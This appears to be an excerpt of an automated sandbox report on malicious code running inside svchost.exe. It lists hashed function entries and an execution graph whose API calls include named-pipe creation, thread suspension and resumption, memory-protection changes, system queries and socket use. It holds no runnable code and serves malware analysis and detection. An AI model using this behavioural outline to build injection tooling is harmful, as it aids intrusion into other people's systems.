                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                • Instruction ID: f4d3286142eb7e6cd51e07f8af886a1a2c06cc227de27c66da3b5f84044b810b
                                                                                                                • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                • Instruction Fuzzy Hash: 92415F31608D4E8FDB84EF6CD888AA577E1FF68351711466BD40EC3651DB34E8848BD0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                • Instruction ID: 26995effdbcfcfde1fb301c738302b36fecf1838b05e8eee2550aa402be31ae3
                                                                                                                • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                • Instruction Fuzzy Hash: C931E23160CE8A5FE758EB64D8459A6B3F4FF14390B20432AD85FC2591EF25F84287D0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: fecab967ce68162db42977c85a03fdc32cd9cce0d0e8386cdf234f9e61cf8174
                                                                                                                • Instruction ID: 8344086de9b913761a411d7955f8cc7c96a5fb13b7116f0cbdca6ddefb856fbd
                                                                                                                • Opcode Fuzzy Hash: fecab967ce68162db42977c85a03fdc32cd9cce0d0e8386cdf234f9e61cf8174
                                                                                                                • Instruction Fuzzy Hash: 1331E720A1CE894BF7E89F2C85463F277E5FF45350F64417AD84FC7292DB28A84683A4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                • Instruction ID: 5ea62730fd75177b122656b87fe1db04d356f6cfea3ea397d4e0478f9f51e1cf
                                                                                                                • Opcode Fuzzy Hash: 846e1ff395a9a0e97b589690a9bc8b88936b2e8aac8a799f01e9c267aa4d71c2
                                                                                                                • Instruction Fuzzy Hash: 4641AB70908A188EDBA1DF18D4847D577E1FB58701F2842BBDC4DCF25ADB749885CBA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                • Instruction ID: 218d09fc95330a8e7c7010bc314c50f6ccf7ef3343bbba0994e9570c7934410c
                                                                                                                • Opcode Fuzzy Hash: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                • Instruction Fuzzy Hash: 1A315C3165CE488FEB55EB18C481ADAB3E1FFA9391F20026AD04EC7291DB35F845CB91
                                                                                                                APIs
                                                                                                                • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF415AB740A), ref: 00007DF415A9780B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                • Instruction ID: f9e165330cef933075b6378a2cbfbef8466cb1718cda295a3ef5e8dd8ee2950c
                                                                                                                • Opcode Fuzzy Hash: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                • Instruction Fuzzy Hash: EA21C331614D1C8FDB48EF1CD88CBA177E1EB6835171442A7D80ECB255DA25E884CB90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                • Instruction ID: a5f81a58ba3264797f2196348aec19fc90495e8579becc51c4899eeec05ddb85
                                                                                                                • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                • Instruction Fuzzy Hash: 57212870E08C5C8FDEA4EA1CC0D89A977E2EB9875077902A2D81ECB199D725EC80C7D0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                • Instruction ID: 10c98939da8c84942678abf2211259b12f8aea4dc81369eb39ff22ccd7d343af
                                                                                                                • Opcode Fuzzy Hash: f9d8d64e7c2c4c7956bd9358d16aebce3c9b4a36e71dd88cc3658fe52e189f83
                                                                                                                • Instruction Fuzzy Hash: 53215030618A584FEB44EF68C8C579673E5FF98310F5042B6980ECB29ADF34D845CB90
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 1586166983-0
                                                                                                                • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                • Instruction ID: 6c3c6e02e2abfc7cab192ff44b0f0ac63eaf56fe13835157e3d08097ffaef4ca
                                                                                                                • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                • Instruction Fuzzy Hash: 30117530B849444BEB98D7699C593A736E1EF94251B24437BD80FC2576FF289904D760
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                • Instruction ID: e92cc83507a3f894527e6eb4096a4cfa3e355833098c7ef07ac5e4d258df9ddc
                                                                                                                • Opcode Fuzzy Hash: a647a70f472eec1f0232b607393523916aff4e703a7abd28a79881bfecac5ea9
                                                                                                                • Instruction Fuzzy Hash: 2F01BB31648D4C8FDF88EB18C4D8E5573E5FBA831572445A6D40ECF249DA35ED86CB50
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                • Instruction ID: 839873e5dfc8f737d0b6097616778fb804416bf0231f830f16165b9f93950a82
                                                                                                                • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                • Instruction Fuzzy Hash: 43018630A58E4A8BDB98DB2C880466732F1FF5835577482BFD00EC72D0D73AD8428751
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2635317215-0
                                                                                                                • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                • Instruction ID: 2fe64dfefd480368639545c1e807875b9c1bb4b16d8b41d60c2003b517944640
                                                                                                                • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                • Instruction Fuzzy Hash: 59F05430614D0A4FF784AB28985CB7579E4EF98341FA44176D90AC6290DF79CC56D750
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                • Instruction ID: 590ac86f6006816572d2e14aae4e3678b9d5c4a16ae2f7c1c1134504607576ea
                                                                                                                • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                • Instruction Fuzzy Hash: 94F0447075BD4ACBFF58B765A8A827577E0EF14302B14002BE80BC11B0CB6D94549732

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 80 20d09dc19b4-20d09dc19d1 82 20d09dc19d3-20d09dc19da 80->82 83 20d09dc19dd-20d09dc19e4 80->83 82->83 84 20d09dc19fb-20d09dc1a09 83->84 85 20d09dc19e6-20d09dc19f9 VirtualFree 83->85 85->84
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.3444451166.0000020D09DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D09DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_20d09dc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 1263568516-0
                                                                                                                • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                • Instruction ID: c12b52145c2e2915c1b96473d4d7bded4d973d85b05c0f1131937dd9b5dc5244
                                                                                                                • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                • Instruction Fuzzy Hash: 01F03071155A098FDF5CEE95C4C8BB133A5FB28301F040179CC0ACB157DA21D841C751
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                • Instruction ID: f707ff2559a3ab0f5c0e824445b8f44871025f582a080d4b1aaf6dd58812afc9
                                                                                                                • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                • Instruction Fuzzy Hash: 8BD0A750B56D0D0FBB58A27F1C8D1BA21E5EBDC1627584237FC0DC2251EE19CC854370
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                • Instruction ID: 37c3d97c3899308abc8377c35d6d6bceb1ba1573fcf46681881b98a8b0da78d5
                                                                                                                • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                • Instruction Fuzzy Hash: 64D05E3064AD0B0BEF9CBBAA44A967536E0DF68382B20003D940BC1991CB1AC841D310
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2803490479-0
                                                                                                                • Opcode ID: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                • Instruction ID: be6820c42bbba9edaec0ba57c7a4be84a7baa4e47818d64400c5c75a9db4594e
                                                                                                                • Opcode Fuzzy Hash: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                • Instruction Fuzzy Hash: 55D01210709D492BBB5077FA1C8C57625D4CB282637100022F829C0160EE49C990D322
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: free
                                                                                                                • String ID:
                                                                                                                • API String ID: 1294909896-0
                                                                                                                • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                • Instruction ID: c8b27a0b5d09e3064be5258b940439085469da165feae53856b3b7a2011a28b7
                                                                                                                • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                • Instruction Fuzzy Hash: 54B0122885BCEB02ED5C33B74C5A0AA3460EF04202FC40119E81BC0451F70DC1948362
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                • Instruction ID: 6b5de7765083f1fcecf79d76d96fc317e58b19ab22377307484a88b0d29399c3
                                                                                                                • Opcode Fuzzy Hash: b5b40462eea7a53d4f43fef84958c55854cf61dddd4c725374532822cf4ebc6c
                                                                                                                • Instruction Fuzzy Hash: B4B01122E2880082C2080E0AB802330F2B2C30B300F003030200AF3A20C8A0CC802ACF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.3444451166.0000020D09DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D09DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_20d09dc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.2%
                                                                                                                Dynamic/Decrypted Code Coverage:24.8%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:318
                                                                                                                Total number of Limit Nodes:32
                                                                                                                execution_graph 34184 2446541d004 34185 2446541d057 34184->34185 34192 2446541aef0 34185->34192 34187 2446541d07f CreateNamedPipeW 34188 2446541d0c7 34187->34188 34191 2446541d109 34187->34191 34189 2446541d0e0 BindIoCompletionCallback 34188->34189 34190 2446541d0f8 ConnectNamedPipe 34189->34190 34189->34191 34190->34191 34193 2446541af2c 34192->34193 34196 24465422e84 34193->34196 34195 2446541af34 34195->34187 34197 24465422e98 NtAcceptConnectPort 34196->34197 34198 24465422eb2 34196->34198 34197->34198 34198->34195 34199 7df4df3b3cdc 34200 7df4df3b3ce9 34199->34200 34201 7df4df3b3d54 34199->34201 34200->34201 34202 7df4df3b3d1b SetWinEventHook 34200->34202 34202->34201 34203 7df4df3c063c 34204 7df4df3c064e 34203->34204 34205 7df4df3c0655 34203->34205 34205->34204 34206 7df4df3c068e free 34205->34206 34206->34204 34207 24465412908 34208 2446541295b 34207->34208 34209 2446541291a 34207->34209 34209->34208 34210 2446541293d ResumeThread 34209->34210 34210->34209 34211 2446541bc28 34212 2446541bc2d 34211->34212 34214 2446541bc56 34211->34214 34215 2446541ba4c 34212->34215 34216 2446541ba6d 34215->34216 34217 2446541bb44 CreateWindowExW 34216->34217 34218 2446541bba1 34216->34218 34217->34218 34218->34214 34219 7df4df3e47b8 34220 7df4df3e47ee 34219->34220 34221 7df4df3e4b08 34220->34221 34231 7df4df3e1708 34220->34231 34225 7df4df3e4909 calloc 34228 7df4df3e482b 34225->34228 34230 7df4df3e4a12 34225->34230 34226 7df4df3e4958 34227 7df4df3e49e3 SendMessageA 34226->34227 34227->34230 34228->34221 34228->34225 34228->34226 34240 7df4df3e2730 NtQuerySystemInformation NtQuerySystemInformation 34230->34240 34232 7df4df3e173b 34231->34232 34233 7df4df3e1715 34231->34233 34235 7df4df3e1740 34232->34235 34233->34232 34234 7df4df3e171b RtlAddFunctionTable 34233->34234 34234->34232 34236 7df4df3e1760 VirtualProtect 34235->34236 34238 7df4df3e176f 34235->34238 34236->34238 34237 7df4df3e180d 34237->34228 34238->34237 34239 7df4df3e17e9 VirtualProtect 34238->34239 34239->34238 34241 2446541262c 34242 2446541265f 34241->34242 34244 24465412680 Thread32First 34242->34244 34248 24465412738 34242->34248 34243 2446541288e 34247 24465412685 34244->34247 34245 24465412771 SuspendThread 34245->34248 34246 2446541272f CloseHandle 34246->34248 34247->34246 34248->34243 34248->34245 34249 2446541698c 34250 244654169a6 34249->34250 34251 244654169ab LoadLibraryA 34250->34251 34252 244654169b0 34250->34252 34251->34252 34253 7df4df3e25d4 NtQuerySystemInformation 34254 7df4df3e25f7 34253->34254 34255 7df4df3e2613 NtQuerySystemInformation 34254->34255 34256 7df4df3e262f 34254->34256 34255->34256 34257 244654174f0 34260 24465417528 34257->34260 34258 244654175c3 VirtualFree 34258->34260 34259 24465417782 34260->34258 34260->34259 34261 2446541bef0 34262 2446541bf19 34261->34262 34263 2446541bf29 34262->34263 34264 2446541bf47 LoadLibraryA 34262->34264 34264->34263 34265 7df4df3b8c38 SetErrorMode 34266 7df4df3b8c4c 34265->34266 34267 7df4df3bc8f2 socket 34266->34267 34268 7df4df3bc981 34267->34268 34269 7df4df3bc936 closesocket 34267->34269 34271 7df4df3bc987 socket 34268->34271 34269->34271 34272 7df4df3bc99f 34271->34272 34273 24465415918 34276 24465416c68 34273->34276 34275 2446541592a 34277 24465416d54 34276->34277 34278 24465416c71 34276->34278 34277->34275 34278->34277 34287 24465423218 34278->34287 34280 24465416d06 34280->34277 34295 24465413c88 34280->34295 34282 24465416d12 34283 24465416d29 SetErrorMode 34282->34283 34284 24465416d42 34283->34284 34286 24465416d6c 34283->34286 34284->34277 34299 244654169ec 34284->34299 34286->34275 34292 24465423265 34287->34292 34288 244654242a6 34288->34280 34289 24465423d5a RtlFormatCurrentUserKeyPath 34290 24465423d66 34289->34290 34290->34288 34291 24465423eab calloc 34290->34291 34291->34288 34293 24465423ed1 34291->34293 34292->34288 34292->34289 34292->34290 34293->34288 34315 2446541563c 6 API calls 34293->34315 34296 24465413c95 34295->34296 34297 24465413cbb 34295->34297 34296->34297 34298 24465413c9b RtlAddFunctionTable 34296->34298 34297->34282 34298->34297 34300 244654169f5 34299->34300 34314 24465416a68 34299->34314 34301 24465416acd 34300->34301 34303 24465416a21 34300->34303 34343 2446542105c 16 API calls 34301->34343 34304 24465416a99 34303->34304 34305 24465416a3d 34303->34305 34303->34314 34342 244654216c8 13 API calls 34304->34342 34307 24465416a8c 34305->34307 34308 24465416a42 34305->34308 34341 24465421188 16 API calls 34307->34341 34310 24465416a77 34308->34310 34311 24465416a47 34308->34311 34340 244654212bc 19 API calls 34310->34340 34311->34314 34316 2446541d7c0 34311->34316 34314->34277 34315->34288 34317 2446541d7e0 34316->34317 34344 2446541aa34 34317->34344 34319 2446541d7f3 34320 2446541d7fb MapViewOfFile 34319->34320 34321 2446541d85f CloseHandle 34319->34321 34328 2446541d825 34320->34328 34322 2446541d92b 34321->34322 34323 2446541d871 34321->34323 34369 2446541a9d4 34322->34369 34323->34322 34347 24465412b54 34323->34347 34327 2446541d881 34327->34322 34351 2446541e2a8 34327->34351 34332 2446541d84a 34328->34332 34367 24465420674 malloc 34328->34367 34332->34321 34334 2446541d893 34360 2446541d3b4 6 API calls 34334->34360 34336 2446541d898 34361 244654179a0 34336->34361 34338 2446541d8e7 34368 24465412ba8 6 API calls 34338->34368 34340->34314 34341->34314 34342->34314 34343->34314 34345 2446541aa4f malloc 34344->34345 34346 2446541aa6a 34344->34346 34345->34346 34346->34319 34348 24465412b64 34347->34348 34349 24465412b6d HeapCreate 34348->34349 34350 24465412b86 34348->34350 34349->34350 34350->34327 34352 2446541e2c0 34351->34352 34353 2446541e30a 34352->34353 34372 24465412c24 34352->34372 34355 2446541e317 VirtualProtect 34353->34355 34356 2446541d88e 34353->34356 34376 24465411000 34355->34376 34359 2446541e1dc GetSystemInfo VirtualAlloc 34356->34359 34358 2446541e344 VirtualProtect 34358->34356 34359->34334 34360->34336 34362 244654179ce 34361->34362 34364 24465417c40 34362->34364 34366 24465417b8e 34362->34366 34385 244654177dc 34362->34385 34363 2446541a9d4 free 34363->34364 34364->34338 34366->34363 34367->34332 34368->34322 34370 2446541a9e7 free 34369->34370 34371 2446541a9f8 34369->34371 34370->34370 34370->34371 34371->34314 34373 24465412c52 34372->34373 34375 24465412cbc 34373->34375 34378 244654124c4 34373->34378 34375->34353 34377 2446541100c 34376->34377 34377->34358 34377->34377 34381 244654122d4 GetSystemInfo 34378->34381 34382 24465412305 34381->34382 34383 244654123a4 VirtualAlloc 34382->34383 34384 244654123cf 34382->34384 34383->34382 34383->34384 34384->34375 34386 24465417804 34385->34386 34393 24465423158 34386->34393 34388 2446541782d 34390 24465417879 34388->34390 34397 24465422ec8 34388->34397 34391 244654178bb GetVolumeInformationW 34390->34391 34392 2446541790c 34390->34392 34391->34392 34392->34366 34394 2446542317b 34393->34394 34396 24465423173 34393->34396 34395 244654231dc NtAcceptConnectPort 34394->34395 34394->34396 34395->34396 34396->34388 34398 24465422f11 34397->34398 34399 24465422f67 NtAcceptConnectPort 34398->34399 34400 24465422f1b 34398->34400 34399->34400 34400->34390 34401 244654169b8 34402 244654169d4 34401->34402 34403 244654169d9 GetProcAddressForCaller 34402->34403 34404 244654169e2 34402->34404 34403->34404 34405 24465412978 34406 244654129a6 VirtualProtect 34405->34406 34407 2446541299e 34405->34407 34409 244654129cb 34406->34409 34410 244654129c1 34406->34410 34407->34406 34408 24465412a0d VirtualProtect 34408->34410 34409->34408 34411 7df4df3b4290 34412 7df4df3b42c3 34411->34412 34418 7df4df3b44c0 34412->34418 34422 7df4df3b1708 34412->34422 34416 7df4df3b4453 34417 7df4df3b449b SendMessageA 34416->34417 34417->34418 34419 7df4df3b43f0 calloc 34420 7df4df3b42fe 34419->34420 34420->34416 34420->34418 34420->34419 34431 7df4df3b31bc free 34420->34431 34423 7df4df3b1715 34422->34423 34424 7df4df3b173b 34422->34424 34423->34424 34425 7df4df3b171b RtlAddFunctionTable 34423->34425 34426 7df4df3b1740 34424->34426 34425->34424 34427 7df4df3b1760 VirtualProtect 34426->34427 34429 7df4df3b176f 34426->34429 34427->34429 34428 7df4df3b180d 34428->34420 34429->34428 34430 7df4df3b17e9 VirtualProtect 34429->34430 34430->34429 34431->34420 34432 7df4df3b3cb0 34433 7df4df3b3cc7 34432->34433 34436 7df4df3b2f48 34433->34436 34435 7df4df3b3cd5 34437 7df4df3b2f6a 34436->34437 34439 7df4df3b2f87 34437->34439 34440 7df4df3b2e90 NtQuerySystemInformation 34437->34440 34439->34435 34441 7df4df3b2eb3 34440->34441 34442 7df4df3b2eb9 malloc 34440->34442 34441->34442 34443 7df4df3b2ecf NtQuerySystemInformation 34442->34443 34444 7df4df3b2eeb 34442->34444 34443->34444 34444->34439 34445 7df4df4022cc 34447 7df4df4022ee 34445->34447 34446 7df4df40276d 34447->34446 34453 7df4df401290 34447->34453 34451 7df4df402754 SetTimer 34451->34446 34452 7df4df402329 34452->34446 34452->34451 34454 7df4df4012c3 34453->34454 34455 7df4df40129d 34453->34455 34457 7df4df4012c8 34454->34457 34455->34454 34456 7df4df4012a3 RtlAddFunctionTable 34455->34456 34456->34454 34458 7df4df4012e8 VirtualProtect 34457->34458 34460 7df4df4012f7 34457->34460 34458->34460 34459 7df4df401395 34459->34452 34460->34459 34461 7df4df401371 VirtualProtect 34460->34461 34461->34460 34466 2446541515c 34479 24465422a20 34466->34479 34468 24465415374 34469 244654151b5 34469->34468 34470 24465415367 34469->34470 34482 24465422dac 34469->34482 34491 2446542290c 34470->34491 34477 24465422dac NtAcceptConnectPort 34478 244654152f2 34477->34478 34488 24465422ddc 34478->34488 34480 24465422a45 34479->34480 34481 24465422a30 NtAcceptConnectPort 34479->34481 34480->34469 34481->34480 34483 24465422dbc NtAcceptConnectPort 34482->34483 34484 24465415244 34482->34484 34483->34484 34484->34470 34485 24465422cac 34484->34485 34486 24465415290 34485->34486 34487 24465422cbf NtAcceptConnectPort 34485->34487 34486->34477 34486->34478 34487->34486 34489 24465422dec NtAcceptConnectPort 34488->34489 34490 24465422df0 34488->34490 34489->34490 34490->34470 34492 2446542291c NtAcceptConnectPort 34491->34492 34493 24465422920 34491->34493 34492->34493 34493->34468 34494 2446541cc9c 34495 2446541ccba 34494->34495 